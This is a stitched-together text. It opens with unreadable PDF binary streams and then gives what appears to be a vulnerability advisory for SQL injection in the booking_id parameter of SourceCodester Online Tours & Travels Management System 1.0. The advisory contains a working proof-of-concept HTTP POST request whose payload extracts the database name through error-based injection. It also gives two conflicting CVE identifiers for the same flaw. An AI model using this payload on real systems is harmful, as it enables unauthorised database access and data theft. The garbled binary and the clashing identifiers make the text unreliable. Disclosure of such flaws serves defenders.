%PDF-1.7 %���� 75 0 obj <> endobj 100 0 obj <>/Encrypt 76 0 R/Filter/FlateDecode/ID\[<4F54C20543CA154FA285B97CE6545091><91F2217956FBE340806248B215D60CE9>\]/Index\[75 41\]/Info 74 0 R/Length 111/Prev 246323/Root 77 0 R/Size 116/Type/XRef/W\[1 3 1\]>>stream h�bbd\`\`\`b\`\`�L�A$�ɨ&�A$�"��2��o\`���L��E ��"L\`6�1$q5��� ��d\\ ��bG���ɿ ;��n�V��H5�?Ӊ��Rn endstream endobj startxref 0 %%EOF 115 0 obj <>stream V��>;��V��c��6��(}P��BPp��\_�DA�}���~�P��q��Η�φlr�\]n2��h�x,K����؉����a��RF�A�C��?\`�PC�M��R!1�h�PO�����(:w��.��=�򈲐��S������w����5��?\*��(�}�W�j endstream endobj 76 0 obj <>>>/Filter/Standard/Length 256/O(�p0c̹s��\\(�{#:\\(3���oTl�&���@���4�,�.쉍���Av)/OE(�m�~���4��X�&�bÑ�\\(�R5I#\\(%�C�)/P -1324/Perms(>v�����.�����J)/R 6/StmF/StdCF/StrF/StdCF/U(�#�}ᣚ���z�F��k�F\`>Z\\r�!Wj>��౭�v������S��)/UE(�q^ռ����zU\\n�o���b�Х���)/V 5>> endobj 77 0 obj <>/Metadata 5 0 R/OpenAction 78 0 R/PageLayout/SinglePage/Pages 73 0 R/StructTreeRoot 10 0 R/Type/Catalog>> endobj 78 0 obj <> endobj 79 0 obj <>/ProcSet\[/PDF/Text\]>>/Rotate 0/StructParents 0/Type/Page>> endobj 80 0 obj <>stream =��Fʤ��\\���W�=�w�j�ܞ$��{π�"��� 3�z\`��5wV����>�&�e���P��X�Ȯ��)V�8��Dh�)�t�����և~\`I"���h�?t�l�H.�\_��p���>1�":\*0Yp(�v}ڿ%����ʢ�Hx�Mh���2���r���,��z��҈�,�c���|��@�Z�U�eB�g%��gu/����ֆ�'n�$����!w���T\_� ���!J�CyN�a|�rd�V\\ r-Zc9��h��6���c�qs�\`�"3�g�:� �X�q�^��\_dU���~"��8���e�#�S�m'q�R�ŠFIl��yN,�6M�))��(z�����Z\]YG���8��^���(����\_Mv49�AF�D)���䚖�7��ڵ�F�G�ғ�+��gJ�.�ßs�@T,�Th���<ͬ�1��Բ4�� �#��zV!�\`�4 ��lB2J����>�!�:mڟC�4���a~0e+o�3�G�R�&���J�V�A��{\\�S��5\]b8����0�j}D(40�,�5�d0�I�P�&�Gw7Ȭ UOT}��+�2��?&\*n��'���Ȫ�2����\`@� ���ե\[fXs�ܾ�o~��l�g���jm��<͆3-�Q��I�~�z�L7��XYFQ?�8�XVC�~�u�ו�v�N� � �2���U?�����4�1Ǝ\_�>�K�����7�imk��n�h��9�X�F�f&�p�R�:�\*��R�K�\*Kyu��~�,u��)�|���Y��Lu���6��/�'���:� ���1 իT�B\]#����Y���� M�K��8�m�A��b�$A�

CVE-2023-22324

A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects an unknown part of the file user\operations\payment_operation.php. The manipulation of the argument booking_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219729 was assigned to this vulnerability.

Login account: It is necessary to organize and test ordinary users to log in to the system

POST /otmsp/user/operations/payment\_operation.php HTTP/1.1
Host: 192.168.1.12
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID\=bi87aa4ksm22phibq5cdbmgce2
Connection: close
Content\-Type: application/x-www-form-urlencoded
Content\-Length: 96

submit=&booking\_id=1' AND GTID\_SUBSET(CONCAT('~',(SELECT DATABASE()),'~'),6055) AND 'uYsm'\='uYsm

CVE-2023-0570: online-tours-travels-management-system/user_operations_payment_operation_booking_id.md at main · linmoren/online-tours-travels-management-system

Tag

#sql